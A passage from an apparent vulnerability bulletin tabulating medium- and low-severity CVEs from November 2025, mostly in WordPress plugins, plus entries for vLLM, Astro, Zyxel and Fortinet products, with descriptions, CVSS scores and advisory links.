| SourceCodester--Train Station Ticketing System | A security vulnerability has been detected in SourceCodester Train Station Ticketing System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_ticket. Such manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-11-18 | 6.3 | CVE-2025-13345 | VDB-332763 | SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332763 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691943 | SonarSource Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/15 https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A vulnerability was detected in SourceCodester Train Station Ticketing System 1.0. This affects an unknown part of the file /ajax.php?action=save_station. Performing manipulation of the argument id/station results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-11-18 | 6.3 | CVE-2025-13346 | VDB-332764 | SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332764 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691944 | SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/16 https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A flaw has been found in SourceCodester Train Station Ticketing System 1.0. This vulnerability affects unknown code of the file /ajax.php?action=save_user. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-11-18 | 6.3 | CVE-2025-13347 | VDB-332765 | SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332765 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691945 | SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/17 https://www.sourcecodester.com/   |
| sscovil--CSV to SortTable | The CSV to SortTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'csv' shortcode in all versions up to, and including, 4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-12823 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53c59793-27db-44fa-92c8-2184d6914d8f?source=cve https://wordpress.com/plugins/csv-to-sorttable   |
| sundayfanz--wModes Catalog Mode, Product Pricing, Enquiry Forms & Promotions | for WooCommerce | The wModes - Catalog Mode, Product Pricing, Enquiry Forms & Promotions plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.2.2. This is due to the plugin not properly verifying that a user is authorized to access sensitive information via the AJAX endpoint. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive information including user emails, usernames, roles, capabilities, and WooCommerce data such as products and payment methods. | 2025-11-18 | 4.3 | CVE-2025-12639 | https://www.wordfence.com/threat-intel/vulnerabilities/id/979001c4-45dd-4168-8749-c8eebe237b60?source=cve https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L12 https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L29 https://plugins.trac.wordpress.org/browser/catalog-mode-pricing-enquiry-forms-promotions/tags/1.2.1/framework/reon/core/class.reon.core.ajax.php#L165 https://plugins.trac.wordpress.org/changeset/3392651/catalog-mode-pricing-enquiry-forms-promotions/trunk?contextall=1&old=3390779&old_path=%2Fcatalog-mode-pricing-enquiry-forms-promotions%2Ftrunk#file11   |
| surbma--Surbma | MiniCRM Shortcode | The Surbma | MiniCRM Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode attribute of the 'minicrm' shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f7509053-fc70-420a-b998-b7158732c147?source=cve https://plugins.trac.wordpress.org/browser/surbma-minicrm-shortcode/tags/2.0/surbma-minicrm-shortcode.php#L34   |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-12746 | https://www.wordfence.com/threat-intel/vulnerabilities/id/014dd0ee-0bd0-477c-a0fa-bde8ce5a099c?source=cve https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/theme-helper/template-tags.php#L1652 https://plugins.trac.wordpress.org/changeset/3395909/tainacan/trunk/classes/theme-helper/template-tags.php   |
| tainacan--Tainacan | The Tainacan plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.0 via uploaded files marked as private being exposed in wp-content without adequate protection. This makes it possible for unauthenticated attackers to extract potentially sensitive information from files that have been marked as private. | 2025-11-21 | 5.3 | CVE-2025-12747 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c64869f0-a4dd-4135-8ed8-a6ff82a48e1f?source=cve https://github.com/tainacan/tainacan/blob/2491612ee9d5b14baa70862ba2308ee925de0938/src/classes/class-tainacan-private-files.php https://github.com/tainacan/tainacan/compare/1.0.0...1.0.1   |
| Tanium--TanOS | Tanium addressed an arbitrary file deletion vulnerability in TanOS. | 2025-11-19 | 5.6 | CVE-2025-13225 | TAN-2025-036   |
| techjewel--FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution | The FluentCRM - Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fluentcrm_content' shortcode in all versions up to, and including, 2.9.84 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-12935 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7129e5cb-ce70-477a-a8f1-3acf152dfc21?source=cve https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.84/app/Hooks/actions.php#L172 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.84/app/Hooks/Handlers/PrefFormHandler.php#L175 https://plugins.trac.wordpress.org/changeset/3399640/   |
| techlabpro1--Classified Listing AI-Powered Classified ads & Business Directory Plugin | The The Classified Listing - Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.0.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2025-11-17 | 5.4 | CVE-2025-7711 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9b10db9-0c7c-4f13-9d98-6d407446cfb8?source=cve https://plugins.trac.wordpress.org/browser/classified-listing/tags/5.0.2/app/Controllers/Hooks/FilterHooks.php#L367   |
| themeatelier--IDonate Blood Donation, Request And Donor Management System | The IDonate - Blood Donation, Request And Donor Management System plugin for WordPress is vulnerable to unauthorized modification od data due to a missing capability check on the panding_blood_request_action() function in all versions up to, and including, 2.1.15. This makes it possible for unauthenticated attackers to delete arbitrary posts. | 2025-11-22 | 5.3 | CVE-2025-12877 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96bd997f-63d5-47a7-b433-486c1113b44b?source=cve https://plugins.trac.wordpress.org/changeset/3398056/idonate/trunk/src/Helpers/IDonateAjaxHandler.php?old=3372718&old_path=idonate%2Ftags%2F2.1.13%2Fsrc%2FHelpers%2FIDonateAjaxHandler.php https://plugins.trac.wordpress.org/changeset/3400306/idonate/trunk/src/Helpers/IDonateAjaxHandler.php?old=3372718&old_path=idonate%2Ftags%2F2.1.13%2Fsrc%2FHelpers%2FIDonateAjaxHandler.php   |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs. | 2025-11-21 | 5.3 | CVE-2025-11368 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c9856db-3779-4649-9a48-1c7b6d019816?source=cve https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L41 https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L23 https://plugins.trac.wordpress.org/changeset?old_path=/learnpress/tags/4.2.9.4&new_path=/learnpress/tags/4.3.0&sfp_email=&sfph_mail=   |
| tigroumeow--AI Engine | The AI Engine plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.8 via the rest_helpers_create_images function. This makes it possible for authenticated attackers, with Editor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On Cloud instances, this issue allows for metadata retrieving. | 2025-11-18 | 6.8 | CVE-2025-8084 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3b497bc0-bf47-43c7-9d5f-8e130dd0bab2?source=cve https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.5/classes/rest.php#L742 https://plugins.trac.wordpress.org/browser/ai-engine/tags/2.9.5/classes/services/image.php#L89   |
| timeslotplugins--Booking Plugin for WordPress Appointments Time Slot | The Booking Plugin for WordPress Appointments - Time Slot plugin for WordPress is vulnerable to unauthorized email sending in versions up to, and including, 1.4.7 due to missing validation on the tslot_appt_email AJAX action. This makes it possible for unauthenticated attackers to send appointment notification emails to arbitrary recipients with attacker-controlled text content in certain email fields, potentially enabling the site to be abused for phishing campaigns or spam distribution. | 2025-11-19 | 5.3 | CVE-2025-12842 | https://www.wordfence.com/threat-intel/vulnerabilities/id/087b6943-5da8-44fe-8614-832768444178?source=cve https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L21 https://plugins.trac.wordpress.org/browser/timeslot/tags/1.4.6/public/form/email.php#L23 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397527%40timeslot&new=3397527%40timeslot&sfp_email=&sfph_mail=   |
| trainingbusinesspros--Groundhogg CRM, Newsletters, and Marketing Automation | The Groundhogg - CRM, Newsletters, and Marketing Automation plugin for WordPress is vulnerable to SQL Injection via the 'term' parameter in all versions up to, and including, 4.2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-11-21 | 4.9 | CVE-2025-12750 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d231e1-a63e-4b41-a6b7-91e6dfc33600?source=cve https://github.com/groundhoggwp/groundhogg/blob/master/includes/functions.php#L5705 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394550%40groundhogg&new=3394550%40groundhogg&sfp_email=&sfph_mail=#file14   |
| tripleatechnology--Cryptocurrency Payment Gateway for WooCommerce | The Cryptocurrency Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'handle_optin_optout' function in all versions up to, and including, 2.0.22. This makes it possible for unauthenticated attackers to opt in and out of tracking. | 2025-11-18 | 5.3 | CVE-2025-12392 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96d48392-fb64-4e5e-be9c-21df0bf75de6?source=cve https://wordpress.org/plugins/triplea-cryptocurrency-payment-gateway-for-woocommerce/   |
| userelements--Ultimate Member Widgets for Elementor WordPress User Directory | The Ultimate Member Widgets for Elementor - WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses. | 2025-11-20 | 5.3 | CVE-2025-12778 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a917a24b-09cc-48e9-844a-e1ed573a708f?source=cve https://plugins.trac.wordpress.org/changeset/3397029/ultimate-member-widgets-for-elementor   |
| valentinpellegrin--ACF Flexible Layouts Manager | The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages. | 2025-11-18 | 6.5 | CVE-2025-12937 | https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4   |
| vaniivan--Simple User Import Export | The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration | 2025-11-18 | 6.6 | CVE-2025-13133 | https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve https://it.wordpress.org/plugins/a3-user-importer/   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1. | 2025-11-21 | 6.5 | CVE-2025-62426 | https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p https://github.com/vllm-project/vllm/pull/27205 https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610 https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814   |
| westerndeal--GSheetConnector For Ninja Forms | The GSheetConnector For Ninja Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'njform-google-sheet-config ' page in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve information about the system. | 2025-11-22 | 4.3 | CVE-2025-13136 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5770cb94-8603-44d9-8cda-925175851b51?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399046%40gsheetconnector-ninja-forms&new=3399046%40gsheetconnector-ninja-forms&sfp_email=&sfph_mail=   |
| willbontrager--Local Syndication | The Local Syndication plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5a via the `url` parameter in the `[syndicate_local]` shortcode. This is due to the use of `wp_remote_get()` instead of `wp_safe_remote_get()` which lacks protections against requests to internal/private IP addresses and localhost. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services, scan internal networks, and access resources that should not be accessible from external networks. | 2025-11-18 | 6.4 | CVE-2025-12962 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7774cdfd-622a-4608-9efd-273923a0d0aa?source=cve https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L64 https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L41   |
| winkm89--WP Admin Microblog | The WP Admin Microblog plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.1. This is due to missing or incorrect nonce validation on the 'wp-admin-microblog' page. This makes it possible for unauthenticated attackers to send messages on behalf of an administrator via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-12173 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c26a76d-a104-4ea6-be9f-9e8dfc3b5cd5?source=cve https://wordpress.org/plugins/wp-admin-microblog/   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.9, when using Astro's Cloudflare adapter (@astrojs/cloudflare) with output: 'server', the image optimization endpoint (/_image) contains a critical vulnerability in the isRemoteAllowed() function that unconditionally allows data: protocol URLs. This enables Cross-Site Scripting (XSS) attacks through malicious SVG payloads, bypassing domain restrictions and Content Security Policy protections. This issue has been patched in version 5.15.9. | 2025-11-19 | 5.4 | CVE-2025-65019 | https://github.com/withastro/astro/security/advisories/GHSA-fvmw-cj7j-j39q https://github.com/withastro/astro/commit/9e9c528191b6f5e06db9daf6ad26b8f68016e533   |
| wpengine--WP Migrate Lite WordPress Migration Made Easy | The WP Migrate Lite - WordPress Migration Made Easy plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.7.6 via the wpmdb_flush AJAX action. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to obtain information about internal services. | 2025-11-18 | 5.8 | CVE-2025-11427 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b098711-ed01-4a71-b0df-30ff4fffa930?source=cve https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/MigrationPersistence/Persistence.php#L50 https://plugins.trac.wordpress.org/browser/wp-migrate-db/tags/2.7.5/class/Common/Migration/Flush.php#L69   |
| wpfanyi--WPSite Shortcode | The WPSite Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'format' shortcode attribute in the wpsite_y shortcode and the 'before' attribute in the wpsite_postauthor shortcode in all versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping in error messages. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11803 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9712c2-1698-4c67-a700-a4598cb25a95?source=cve https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L19 https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L35 https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L51   |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via $item['field_id'] in all versions up to, and including, 1.7.1036 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-6251 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ead108c4-ac09-42ea-95c5-e95dc514f1cb?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/form-builder/widgets/wpr-form-builder.php#L4023   |
| wpswings--Return Refund and Exchange For WooCommerce | The Return Refund and Exchange For WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.5.5 via the wps_rma_fetch_order_msgs() due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read other user's order messages. | 2025-11-21 | 5.4 | CVE-2025-12881 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c159237-1a3a-4d42-9a2e-fbd6ca98f38e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394215%40woo-refund-and-exchange-lite&new=3394215%40woo-refund-and-exchange-lite&sfp_email=&sfph_mail=   |
| wpswings--Return Refund and Exchange For WooCommerce | The Return Refund and Exchange For WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.5.5 via the 'wps_rma_cancel_return_request' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete other users refund requests. | 2025-11-21 | 4.3 | CVE-2025-12086 | https://www.wordfence.com/threat-intel/vulnerabilities/id/126e2b92-322e-440c-a924-1b604330f164?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394215%40woo-refund-and-exchange-lite&new=3394215%40woo-refund-and-exchange-lite&sfp_email=&sfph_mail=   |
| wpwax--Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings | The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'directorist_prepare_listings_export_file' and 'directorist_type_slug_change' AJAX actions in all versions up to, and including, 8.5.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export listing details and change the directorist slug. | 2025-11-19 | 6.5 | CVE-2025-12174 | https://www.wordfence.com/threat-intel/vulnerabilities/id/796c0ded-3a23-4dd6-968a-a8e60bd8ea0e?source=cve https://plugins.trac.wordpress.org/changeset/3394856/directorist/tags/8.5.3/includes/classes/class-ajax-handler.php   |
| wwwlike--vlife | A security vulnerability has been detected in wwwlike vlife up to 2.0.1. This issue affects the function create of the file vlife-base/src/main/java/cn/wwwlike/sys/api/SysFileApi.java of the component VLifeApi. Such manipulation of the argument fileName leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 5.3 | CVE-2025-13266 | VDB-332601 | wwwlike vlife VLifeApi SysFileApi.java create path traversal VDB-332601 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689436 | vlife 2.0.1 Arbitrary File Read https://github.com/wwwlike/vlife/issues/3   |
| xwikisas--application-admintools | XWiki AdminTools integrates administrative tools for managing a running XWiki instance. Prior to version 1.1, users without admin rights have access to AdminTools.SpammedPages. View rights are not restricted only to admin users for AdminTools.SpammedPages. While no data is visible to non admin users, the page is still accessible. This issue has been patched in version 1.1. A workaround involves setting the view rights for the AdminTools space to be only available for the XWikiAdminGroup. | 2025-11-18 | 5.3 | CVE-2025-54990 | https://github.com/xwikisas/application-admintools/security/advisories/GHSA-v7r8-8p5c-h4xw   |
| xwikisas--xwiki-pro-macros | XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to version 1.27.0, a user with no view rights on a page may see the content of an office attachment displayed with the view file macro. This issue has been patched in version 1.27.0. | 2025-11-19 | 6.8 | CVE-2025-65089 | https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-8c52-x9w7-vc95   |
| yithemes--YITH WooCommerce Wishlist | The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale. | 2025-11-19 | 5.3 | CVE-2025-12427 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdb95ac-6b22-44a9-bd5c-b802a2d908d7?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L97 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L38 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L265 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0   |
| yithemes--YITH WooCommerce Wishlist | The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.10.0. This is due to the plugin not properly verifying that a user is authorized to perform actions on the REST API /wp-json/yith/wishlist/v1/lists endpoint (which uses permission_callback => '__return_true') and the AJAX delete_item handler (which only checks nonce validity without verifying object-level authorization). This makes it possible for unauthenticated attackers to disclose wishlist tokens for any user and subsequently delete wishlist items by chaining the REST API authorization bypass with the exposed delete_item nonce on shared wishlist pages and the AJAX handler's missing object-level authorization check. | 2025-11-19 | 5.3 | CVE-2025-12777 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0088a97c-5a06-4500-a923-242499596aca?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L96 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-frontend.php#L740 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L222 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0   |
| zhengdon-- | The 简数采集器 plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.6.3 via the __kds_flag functionality that imports featured images. This makes it possible for authenticated attackers, with Adminstrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-11-21 | 4.9 | CVE-2025-11973 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66dc2ca2-c61c-4c73-aa2a-0017299cbca5?source=cve https://wordpress.org/plugins/keydatas/   |
| Zyxel--DX3301-T0 firmware | An uncontrolled resource consumption vulnerability in the web server of Zyxel DX3301-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an attacker to perform Slowloris‑style denial‑of‑service (DoS) attacks. Such attacks may temporarily block legitimate HTTP requests and partially disrupt access to the web management interface, while other networking services remain unaffected. | 2025-11-18 | 5.3 | CVE-2025-6599 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-uncontrolled-resource-consumption-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-11-18-2025   |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Campcodes--Complete Online Beauty Parlor Management System | A vulnerability was identified in Campcodes Complete Online Beauty Parlor Management System 1.0. This vulnerability affects unknown code of the file /admin/customer-list.php. The manipulation of the argument Name leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-11-20 | 2.4 | CVE-2025-13484 | VDB-333084 | Campcodes Complete Online Beauty Parlor Management System customer-list.php cross site scripting VDB-333084 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696054 | Campcodes Complete Online Beauty Parlor Management System V1.0 Cross Site Scripting https://github.com/Abxery/cveee/issues/8 https://www.campcodes.com/   |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability was determined in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this issue is some unknown functionality of the file /admin/admin_running.php. Executing manipulation of the argument product_name can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-11-19 | 2.4 | CVE-2025-13412 | VDB-332939 | Campcodes Retro Basketball Shoes Online Store admin_running.php cross site scripting VDB-332939 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #693698 | campcodes Retro Basketball Shoes Online Store V1.0 cross site scripting https://github.com/laosijivul/cve/issues/1 https://www.campcodes.com/   |
| Canva--Canva | The Mac App Store distribution of the Canva for Mac desktop app before 1.117.1 was built without Hardened Runtime. A local threat actor with unprivileged access could execute arbitrary code that inherits the TCC (Transparency, Consent, and Control) permissions assigned to Canva. | 2025-11-18 | 3.2 | CVE-2025-12792 | https://trust.canva.com/?tcuUid=1e77a34b-f586-450b-b30d-b6e17d15b443   |
| Fortinet--FortiADC | An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product | 2025-11-18 | 3.9 | CVE-2025-54971 | https://fortiguard.fortinet.com/psirt/FG-IR-25-686   |
| Fortinet--FortiMail | An improper neutralization of crlf sequences ('crlf injection') in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 all versions, FortiMail 7.0 all versions may allow an attacker to inject headers in the response via convincing a user to click on a specifically crafted link | 2025-11-18 | 3.9 | CVE-2025-54972 | https://fortiguard.fortinet.com/psirt/FG-IR-25-634   |
